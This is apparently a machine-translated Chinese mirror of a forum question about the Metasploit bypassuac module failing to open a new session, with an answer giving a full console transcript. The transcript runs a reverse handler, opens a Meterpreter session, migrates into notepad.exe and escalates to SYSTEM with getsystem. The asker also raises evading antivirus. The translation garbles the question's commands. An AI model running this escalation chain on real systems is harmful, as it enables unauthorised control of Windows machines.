1. 首页
  2. 问答
  3. 的Metasploit:bypassuac窗口权限提升挂起

的Metasploit:bypassuac窗口权限提升挂起

2012-02-09 51 views
1

后/窗/升级/ bypassuac似乎失败对我来说的Metasploit:bypassuac窗口权限提升挂起

出于某种原因,我不能得到这个职位,开发模块bypassuac工作。 这是我做过什么:

  1. 打开目标机器上的Meterpreter就会会话(如在NetworkService用户)
  2. 把会议背景

  3. 尝试使用后开发模块是这样的:

    后期使用/窗/升级/ bypassuac 设置会话1个 集LHOST 192.168.1.100 集LPORT 4444利用

  4. 该端口尚未使用,所以应该没问题。

  5. 输出如下:

    [ - ]处理程序不能结合到192.168.1.100:4444 []开始反向处理程序上0.0.0.0:4444 []启动有效负载处理程序。 .. []上载旁路UAC可执行到文件系统... [] Meterpreter就会驿站可执行73802个字节长正在上传.. []上载的代理到文件系统.... []邮模块执行完成

  6. 然后它返回到控制台,什么也不做,没有新的会话,什么也不做。

我查了以下几件事:

  1. 手动上传可执行bypassuac-x86.exe程序的目标。这工作得很好。
  2. 检查virusscanner的警铃是否未响应可执行文件。他们没有

有没有办法手动运行可执行文件,并且有人可以向我解释如何以SYSTEM级别访问方式打开新的meterpreter会话?

或者我可以以某种方式编码有效负载并使用我的自定义模板来规避所有防病毒可能性?我还没有找到任何编码后期开发模块的选项。

在此先感谢

Halvar

来源

2012-02-09 68616c766172

回答

0 
msf exploit(handler) > use post/windows/escalate/bypassuac 
msf post(bypassuac) > show options 

Module options: 

Name Current Setting Required Description 
—- ————— ——– ———– 
RHOST no Host 
RPORT 4444 no Port 
SESSION yes The session to run this module on. 

msf post(bypassuac) > set SESSION 1 
SESSION => 1 
msf post(bypassuac) > exploit 

[*] Started reverse handler on 192.168.1.100:4444 
[*] Starting the payload handler… 
[*] Uploading the bypass UAC executable to the filesystem… 
[*] Meterpreter stager executable 73802 bytes long being uploaded.. 
[*] Uploaded the agent to the filesystem…. 
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect… 
[*] Post module execution completed 
msf post(bypassuac) > 
[*] Sending stage (749056 bytes) to 192.168.1.100 
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011 
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’ 
[*] Current server process: zuWlXDpYlOMM.exe (2640) 
[*] Spawning a notepad.exe host process… 
[*] Migrating into process ID 3276 
[*] New server process: notepad.exe (3276) 

msf post(bypassuac) > sessions -i 2 
[*] Starting interaction with 2… 

meterpreter > getsystem 
…got system (via technique 1). 
meterpreter > sysinfo

来源

2014-01-15 04:26:31 user3196630

相关问题

 相关问题